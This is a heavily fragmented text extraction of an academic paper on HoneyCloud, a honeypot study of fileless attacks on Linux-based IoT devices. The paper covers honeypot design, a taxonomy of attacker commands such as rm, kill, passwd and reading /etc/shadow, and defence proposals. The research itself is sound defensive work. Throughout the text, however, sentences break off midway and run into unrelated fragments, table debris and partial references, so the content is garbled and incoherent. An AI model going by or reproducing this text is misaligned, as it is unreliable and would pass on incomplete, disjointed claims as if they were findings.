# Understanding Fileless Attacks on Linux-based IoT Devices with HoneyCloud

## Fan Dang[1], Zhenhua Li[1], Yunhao Liu[1][,][2], Ennan Zhai[3]
 Qi Alfred Chen[4], Tianyin Xu[5], Yan Chen[6], Jingyu Yang[7]

1Tsinghua University 2Michigan State University 3Alibaba Group 4UC, Irvine
5University of Illinois Urbana-Champaign 6Northwestern University 7Tencent Anti-Virus Lab


### ABSTRACT

based fingerprint sharing. Recently, fileless attacks—attacks that do

### CCS CONCEPTS

- Security and privacy → **Hardware attacks and countermea-**
**sures; Mobile and wireless security.**

**ACM Reference Format:**

based IoT Devices with HoneyCloud. In MobiSys ’19: ACM International
_Conference on Mobile Systems, Applications, and Services, June 17–21, 2019,_
_[Seoul, South Korea. ACM, New York, NY, USA, 13 pages. https://doi.org/10.1](https://doi.org/10.1145/nnnnnnn.nnnnnnn)_

### 1 INTRODUCTION

tomation [49], etc. In particular, the majority of today’s IoT devices

_MobiSys ’19, June 17–21, 2019, Seoul, South Korea_


have employed Linux (e.g., OpenWrt and Raspbian) for its preva
categories: malware-based attacks and fileless attacks.
Threats from malware-based attacks (e.g., Mirai, PNScan, and

been developed. For instance, the hash (e.g., MD5 or SHA-n) of

28, 74], e.g., McAfee Labs reports that fileless attacks surged by

### 1.1 Study Methodology (§2)

To understand Linux-based IoT attacks in the wild, we use honey_pots [67], which are known to be an effective method for captur-_


-----

MobiSys ’19, June 17–21, 2019, Seoul, South Korea F Dang, Z Li, Y Liu, et al.


therefore, attempt to explore a cheap and scalable approach to ef
ertheless, this approach is subject to several practical issues. First,

so as not to miss the relatively rare fileless attacks. Second, they

attacks. Finally, they have to conform with diverse policies imposed

maintenance fee of a software honeypot (∼6 US dollars) is 12.5×
less than that of a hardware honeypot (∼75 US dollars). More impor
### 1.2 Findings and Implications (§3)

which 28 million successfully logged in and enabled attacks.[1] Among
these successful attacks, 1.5 million are identified as fileless attacks,[2]

- We introduce the first taxonomy for fileless IoT attacks by
**correlating multi-source information. For lack of malware**

1The rest of connections (i.e., 89.4% of the observed suspicious connections) cannot

2Different from previous studies on IoT attacks where fileless attacks were scarcely



- Fileless attacks aggravate the threats to IoT devices by in**troducing stealthy reconnaissance methods and unique**
**types of IoT attacks. On one side, we notice that 39.4% of the**

performing de-immunization operations (e.g., shut down the fire
- IoT attacks in the wild are using various types of infor**mation to determine device authenticity. According to our**

commands like lscpu to acquire sensitive system information.

- We discover new security challenges posed by fileless at**tacks and propose new defense directions. While leaving**

rm, kill, ps, and passwd, which are enabled by default in our


-----

Understanding Fileless Attacks on Linux-based IoT Devices MobiSys ’19, June 17–21, 2019, Seoul, South Korea

ISP: Comcast ISP: Telecom

**Figure 2: Geo-distribution of our deployed software honey-**
**pots.**

Software Back-end Hardware
Honeypot Controller Honeypot

**Figure 1: Deployment overview of our system.**


### 2 HONEYPOT DEPLOYMENT

network and monitored, when we expect it to be broken into and

typically suspicious[3].

### 2.1 Overview

**Hardware IoT honeypots.**

3For honeypots deployed in public clouds, the situation can be slightly different since


US dollars per month for Internet connections. Given that the lifes
**Software IoT honeypots. The insights and experiences collected**

ware honeypots (i.e., one VM instance hosts one software honeypot).

CPU @ ∼2.2 GHz, 512 MiB of memory, 10–40 GB of storage, and

costs ∼6 US dollars per month. For all the 108 software honeypots,
the monthly infrastructure fee is ∼640 US dollars.

### 2.2 Hardware IoT Honeypots

**Design and implementation.**


-----

MobiSys ’19, June 17–21, 2019, Seoul, South Korea F Dang, Z Li, Y Liu, et al.

**Table 1: Specifications of our hardware IoT honeypot deployment.**

fee for the two devices reaches 80 and 30 US dollars per month

Services to be compromised

devices cannot share an Internet connection (e.g., through NAT),

|Col1|Col2|Col3|Col4|Col5|Col6|
|---|---|---|---|---|---|
|||||||
|||||||


**Figure 3: System architecture of our developed hardware IoT**
**honeypot based on Raspberry Pi.**

We expose ash—a shell provided by BusyBox [5]—to attackers, so as

password of the root user is set to root by modifying the shadow

we capture threat information of this attack and then reset the
honeypot. Our implementation utilizes initramfs [2] to achieve an

If our hardware honeypot is unavailable (i.e., it does not report
data to the Data Collector, or we cannot log in to it), we reboot the

rebooting, we observed that attackers typically use malware (e.g.,

**Experiences.**


**Implications to software IoT honeypots.**

dollars per month, which is significantly (13×) lower than that of

tem information via commands like lscpu and cat/proc/cpuinfo,

real system information (e.g., CPU information), making the software honeypots look like real IoT devices (detailed in §2.3.1). Second,
we notice that 187 attacks used commands like lsusb (listing con
enable common buses to ensure the fidelity (detailed in §2.3.1).

### 2.3 Software IoT Honeypots


-----

Understanding Fileless Attacks on Linux-based IoT Devices MobiSys ’19, June 17–21, 2019, Seoul, South Korea


**(a) Deployment statistics dur-**
**ing 06/15/2017–12/14/2017**


**(b) Deployment statistics dur-**
**ing 12/15/2017–06/14/2018**


**Figure 4: Architectural overview of our system, as well as the**
**internal structure of a software IoT honeypot.**

three modules: High Fidelity Maintainer (§2.3.1), Shell Interceptor
and Inference Terminal (§2.3.2), and Access Controller (§2.3.3). The

_2.3.1_ _High Fidelity Maintainer. The High Fidelity Maintainer im-_

**Customizing QEMU configurations. To enhance the fidelity of**

that of the emulated IoT device. As we use initramfs to achieve

we initially enable two common buses, i.e., USB and I[2]C, supported

attackers are able to use lsusb to show the information about USB
buses in the system, and they can see an i2c node in the /dev.

**Masking sensitive system information.**

and kernel information (e.g., by checking /proc) [22], we mask

pot, we forge /proc/cpuinfo in OpenWrt and make it look like a

**VM instances rearrangement among public clouds. Since we**


**Table 2: Deployment changes of HoneyCloud. Here “#” de-**
**notes the number of deployed software honeypots.**

notice that all the eight public clouds offer the option of elastic IP ad
_2.3.2_ _Shell Interceptor & Inference Terminal. We build two mod-_

**Shell Interceptor.**

detects the packet type, among which we focus on CHANNEL_DATA
(the actual terminal data) and CHANNEL_WINDOW_ADJUST (the resize

**Inference Terminal. Although the Shell Interceptor has acquired**


-----

MobiSys ’19, June 17–21, 2019, Seoul, South Korea F Dang, Z Li, Y Liu, et al.


Attacker Inside QEMU Outside QEMU

|QEMU with OpenWrt Reset Connect Reset Beacon Manager Heartbeat Honeypot Node|MQTT Heartbeat Back-end Controller Reset|
|---|---|

|Input|SSH Packet|Decryptor Plaintext C _DH AA TN ANEL Da &ta E P xr eo cc ue ts os ror CP onla ti rn ot le Cxt h a& rs Inference Terminal Shell Trace CHANNEL EventR esize _WINDOW Window Resize _ADJUST Data Aggregator Other Other Packet Processor Packet Processor Plaintext Encryptor|
|---|---|---|


**Figure 5: Working flow chart of the Shell Interceptor.**

**Table 3: Special escape sequences.**

1Bh c
1Bh [ H
1Bh [ n J
1Bh [ n K

{“a”, “b”, “←”, “c”} should result in “acb”. If we simply ignore the con
“abc”. Thereby, we need to recover the context of interactions. To fulfill this, we feed the shell and terminal data into pyte [13], a VTxxx

flushes old content), we modify the program of pyte to recover the

hidden inputs (e.g., passwords).

attacker rather than an automatic script (i.e., the authenticity of the

**Evidence collection.**

 - CPU usage as an important indicator of the execution of complex

 - Process list which can track any unintentional, suspicious process

 - Network packets. We first use libpcap to capture almost the full


**Figure 6: Heartbeat-based failure recovery.**

_2.3.3_ _Access Controller. Once a software honeypot is compromised_

benign requests (e.g., DNS packets), while relaxed policies would

_2.3.4_ _Reset Manager. We built heartbeat-based reset to periodically_

malware (e.g., Mirai) can kill the process of the SSH/Telnet server;

### 3 FINDINGS AND IMPLICATIONS

 3.1 General Characteristics and Statistics

|Col1|Col2|Col3|
|---|---|---|
|1Bh c 1Bh [ H 1Bh [ n J 1Bh [ n K|||


-----

Understanding Fileless Attacks on Linux-based IoT Devices MobiSys ’19, June 17–21, 2019, Seoul, South Korea


Intrusion


Infection


Typical
Monetization

|Weak Password|Col2|Download Malware Set up Port Forward|Download Malware|Col5|DoS Telnet/SSH Scan Ransom|DoS|
|---|---|---|---|---|---|---|
|Security Flaws||||||Ransom|
||||||||


**Figure 7: General working flows of captured attacks.**

the intrusion phase, most malware uses brute-force methods (e.g.,

infection phase where wget and tftp are typically used to download

to the command and control (a.k.a., C&C) server to wait for the

tioned in §2, these connections led to 1.6 million effective attacks[4],

average, showing that attacks on IoT devices are actually frequent at
_present._

4A successful login is counted as an effective attack. If any file is downloaded (via wget),


(e.g., CPU bugs and model-specific registers [46, 65]) and advanced
techniques (e.g., execution analysis [34]) to infer the VM identity of

reach our honeypots in the public clouds except Alibaba Cloud.[5]

### 3.2 Malware-based Attacks

In addition, we find that the vast majority (∼92.1%) of malware
5After performing port scanning using nmap [27], Alibaba Cloud blocked our SSH


-----

MobiSys ’19, June 17–21, 2019, Seoul, South Korea F Dang, Z Li, Y Liu, et al.


**(a) Attacks captured by hardware honeypots.**


**(b) Attacks captured by software honeypots.**


**Figure 8: Attacks captured by our hardware and software honeypots in HoneyCloud. FS is short for filesystem and CMD is**
**short for command. Note that in Figure 8b we only plot the new connection lines relative to those in Figure 8a.**


collected malware (e.g., Mirai, Dofloo, and Ganiw) is usually capable

total), MIPS [6] (Big & Little Endian, 25.7% in total), PowerPC [7] (9.2%),
and SPARC [8] (8.9%). This highlights the pressing need for a flexible,

### 3.3 Fileless Attack Taxonomy

- Type I: Occupying end systems (1.8%), e.g., by altering the password of an IoT device (via passwd). Once the password is changed,

- Type II: Damaging system data (54.4%), e.g., by removing or
altering certain configuration files or programs (via rm and dd).

6Broadcom and Atheros have made lots of MIPS SoCs for WiFi routers. Ingenic also

7There are a number of PowerPC-based set-top boxes and game consoles like Wii and

8SPARC-based SoCs have been produced over years, such as LEON.


opens the watchdog device (/dev/watchdog) and makes several

- Type III: Preventing system monitoring/auditing services (8.5%),
_e.g., by killing the watchdog processes or stopping certain ser-_
vices (via kill and service). For instance, after stopping the

- Type IV: Retrieving system information (7.4%), e.g., by getting the
hardware information (via lscpu) and the system information
(via uname, netstat, ps, and free). Such information may be
useful for launching further attacks for specific purposes, e.g.,

- Type V: Stealing valuable data (23.5%), e.g., by reading passwords
and/or certain configuration files (via cat). Note that although
passwords stored in /etc/shadow are salted and hashed, the at
- Type VI: Launching network attacks (0.3%), e.g., by sending mal
web servers (via wget and curl) to launch DoS attacks [31, 32].

- Type VII: Issuing other shell commands for unclear reasons

to us, including who, help, lastlog, sleep, and so on. For some
commands like who and lastlog, we speculate that the attacker


-----

Understanding Fileless Attacks on Linux-based IoT Devices MobiSys ’19, June 17–21, 2019, Seoul, South Korea


**(a) Details of the SSH Tunneling**
**Attack.**


**(b) Analysis procedure of the SSH Tunneling Attack.**


**(c) Network flow of the SSH Tunneling Attack.**


**Figure 9: (a) Details of the SSH Tunneling Attack, (b) the procedure describing how we identify the SSH Tunneling Attack, and**
**(c) how an attacker can launch a SSH Tunneling Attack against a target.**



- Type VIII: Conducting attacks where no shell command is involved (0.3%). A typical example, referred to as SSH Tunneling
_Attack, is demonstrated in Figure 9a, where the attacker has_

on the compromised device (i.e., our honeypots, see the SSH

the attack we observed.[9] Also, we learned that this attack is not

9Since the collected data were encrypted, we did not have direct, ideal evidence but


of which are pretty powerful and stealthy (e.g., the SSH Tunneling

weak authentication issue of today’s IoT devices, i.e., many widely
Solely rm is used by 48% of the fileless attacks, while all the other


50%

40%

30%

20%

10%

0


**Figure 10: Usage frequency of the shell commands.**

### 3.4 Key Insights for Fileless Attacks


-----

MobiSys ’19, June 17–21, 2019, Seoul, South Korea F Dang, Z Li, Y Liu, et al.


attacks are launched through a small set of commands: rm, kill, ps,
and passwd, which are enabled by default in our honeypots (and

device. For example, the kill command is typically designed for

kill shell command. Thus, for a certain IoT device, if some of these

acquire system information before attacking the system (e.g., they

performing de-immunization operations (e.g., shut down the fire
### 3.5 New Security Challenges and Defense Directions

many IoT devices use a read-only filesystem (e.g., SquashFS [38])

mend logging, e.g., using a hybrid filesystem (e.g., OverlayFS [33])
or a versioning filesystem (e.g., Elephant [66]), this inevitability

|oTCheck|Col2|
|---|---|
|||

|Col1|Col2|Col3|Col4|Use stro passwor|
|---|---|---|---|---|
||||||
|||Prevent pu SSH Acce|||
||||||
||||Put most fil read-onl filesyste||
|Default user is root?|No||||
||||||
||Yes||||

|Use strong Unique No password Enable shell strong comand history (Using a small password? Yes writable partition) Prevent public SSH Access Audit locally Put most files in read-only filesystem Upload to the Default user No manufacturer is root? Yes Upload to the community Remove useless components Components No all necessary? Yes|Col2|
|---|---|
|Components all necessary?|No|
||Yes|


**Figure 11: The IoTCheck work flow. Red texts denote that**
**essential actions should be taken. Blue boxes represent the**
**possible auditing schemes.**

We suggest that any IoT device unsuited to using a unique strong
password (e.g., limited by the production and assembly process—

### 4 DISCUSSION ON LIMITATIONS

**Support of emerging IoT interfaces. Although QEMU provides**


IoTCheck


-----

Understanding Fileless Attacks on Linux-based IoT Devices MobiSys ’19, June 17–21, 2019, Seoul, South Korea


**Robustness to the inference of VM identity.**

may leverage more in-depth information (e.g., CPU bugs and modelspecific registers [46, 65]) and advanced techniques (e.g., execution

**In-depth analysis on advanced attacks. HoneyCloud currently**

### 5 RELATED WORK

 5.1 Fileless Attacks

_e.g., the Morris Internet worm, emerged [54]), fileless attacks had_

based on their incursion methods. First, in the in-memory attacks,

programs [10]. A typical example is the EternalBlue attack, which ex
packets [30]. Second, in the non-PE (portable executable) file attacks,

systems (e.g., PowerShell and Microsoft Word) rather than PE files
to launch attacks [51]. Third, there are dual-use system tools that

least, weak or stolen credentials are often used to intrude the victim

10Attackers can also pursue persistence of fileless attacks, e.g., by storing a malicious


### 5.2 Honeypot Solutions

puter systems (e.g., enabling a single host to claim up to 65536

server side), and thus is also called honeyclient. Targeting malware

Vrable et al. built an HIH farm named Potemkin [69]. While

good scalability (e.g., emulating over 64,000 honeypots using only a


-----

MobiSys ’19, June 17–21, 2019, Seoul, South Korea F Dang, Z Li, Y Liu, et al.


**Figure 12: Design tradeoff of honeypots.**


### ACKNOWLEDGEMENT

 REFERENCES


IoTPOT systems, Minn et al. discover that Telnet-based attacks

_et al. use machine learning techniques to acquire the behavioral_
knowledge of IoT honeypots [57]. Moreover, Gandhi et al. set up a

### 6 CONCLUSION

(e.g., Mirai) can quickly spread across IoT devices, they can be



[[20] Key Trends from the IoT Developer Survey 2018. https://blog.benjamin-cabe.c](https://blog.benjamin-cabe.com/2018/04/17/key-trends-iot-developer-survey-2018)


-----

Understanding Fileless Attacks on Linux-based IoT Devices MobiSys ’19, June 17–21, 2019, Seoul, South Korea



[29] Now

[[30] NVD - CVE-2017-0143. https://nvd.nist.gov/vuln/detail/CVE-2017-0143. (Ac-](https://nvd.nist.gov/vuln/detail/CVE-2017-0143)

[35] SecurityBrief Asia - Rogue nations, IoT, fileless malware and drones: A new era

[42] webcamd: daemon which provide access to USB webcam, USB DVB, USB radio,

the Mirai Botnet. In Proceedings of 26th USENIX Security Symposium (USENIX
_Security). USENIX Association, Vancouver, BC, 1093–1110._

ware. In Proceedings of the 9th International Conference on Recent Advances in
_Intrusion Detection. Springer-Verlag, Berlin, Heidelberg, 165–184._

[45] Michele De Donno, Nicola Dragoni, Alberto Giaretta, and Angelo Spognardi. 2018.

_Security and Communication Networks 2018 (2018), 7178164:1–7178164:30._

[46] Peter Ferrie. 2007. Attacks on more virtual machine emulators. Symantec Tech_nology Exchange 55 (2007)._

lance on IoT Devices against Recent Threats. Wireless Personal Communications

Classification: A Survey. Journal of Information Security 05 (Jan 2014), 56–64.

of architectures and technologies. IEEE Communications Magazine 48, 6 (June

Build a Persistent, Asyncronous, and Fileless Backdoor. In Black Hat. Black Hat,

Commands Using Deep Neural Networks. In Proceedings of the 2018 on Asia
_Conference on Computer and Communications Security. ACM, New York, NY, USA,_

[54] Brendan P. Kehoe. 1992. Zen and the Art of the Internet. Prentice-Hall, Inc., Upper

Detection Signatures Using Honeypots. SIGCOMM Comput. Commun. Rev. 34, 1

Consumer IoT Devices. In Proceedings of the 2017 Workshop on Internet of Things
_[Security and Privacy. ACM, New York, NY, USA, 1–6. https://doi.org/10.1145/31](https://doi.org/10.1145/3139937.3139938)_



[57] Tongbo Luo, Zhaoyan Xu, Xing Jin, Yanhui Jia, and Xin Ouyang. 2017. IoTCandyJar: Towards an Intelligent-Interaction Honeypot for IoT Devices. In Black Hat.

eypot in Network Security: A Survey. In Proceedings of the 2011 International
_Conference on Communication, Computing & Security. ACM, New York, NY, USA,_

[malware. Network Security 2017, 4 (2017), 7 – 11. https://doi.org/10.1016/S1353-](https://doi.org/10.1016/S1353-4858(17)30037-5)

[60] Jose Nazario. 2009. PhoneyC: A Virtual Client Honeypot. In Proceedings of the
_2nd USENIX Conference on Large-scale Exploits and Emergent Threats: Botnets,_
_Spyware, Worms, and More (LEET). USENIX Association._

[62] Yin Minn Pa Pa, Shogo Suzuki, Katsunari Yoshioka, Tsutomu Matsumoto,

of IoT Compromises. In Proceedings of the 9th USENIX Conference on Offensive
_Technologies. USENIX Association, Berkeley, CA, USA, 9–9._

[63] Niels Provos. 2004. A Virtual Honeypot Framework. In Proceedings of the 13th
_Conference on USENIX Security Symposium - Volume 13. USENIX Association,_

[64] Niels Provos and Thorsten Holz. 2010. Virtual honeypots: from botnet tracking to
_intrusion detection. Addison-Wesley._

tem Emulators. In Proceedings of the 10th International Conference on Information
_Security. Springer-Verlag, Berlin, Heidelberg, 1–18._

file system that never forgets. In Proceedings of the 7th Workshop on Hot Topics in
_[Operating Systems. 2–7. https://doi.org/10.1109/HOTOS.1999.798369](https://doi.org/10.1109/HOTOS.1999.798369)_

[67] Lance Spitzner. 2003. Honeypots: tracking hackers. Vol. 1. Addison-Wesley Read
them. Network Security 2011, 8 (2011), 16 – 19.

Containment in the Potemkin Virtual Honeyfarm. In Proceedings of the 20th ACM
_Symposium on Operating Systems Principles. ACM, New York, NY, USA, 148–162._

[71] Candid Wueest and Himanshu Anand. 2017. Living off the land and fileless attack
_[techniques. Technical Report. https://www.symantec.com/content/dam/symante](https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/istr-living-off-the-land-and-fileless-attack-techniques-en.pdf)_

[72] Vinod Yegneswaran, Paul Barford, and Vern Paxson. 2005. Using honeynets for
internet situational awareness. In Proceedings of the 4th Workshop on Hot Topics
_in Networks (HotNets). Citeseer, 17–22._

with WiFi. Tsinghua Science and Technology 20, 1 (Feb 2015), 1–6.

Attacks Using Keyboard Acoustic Emanations. In Proceedings of the 2014 ACM
_SIGSAC Conference on Computer and Communications Security. ACM, New York,_

high-interaction honeypot principle. Journal of China Institute of Communications


-----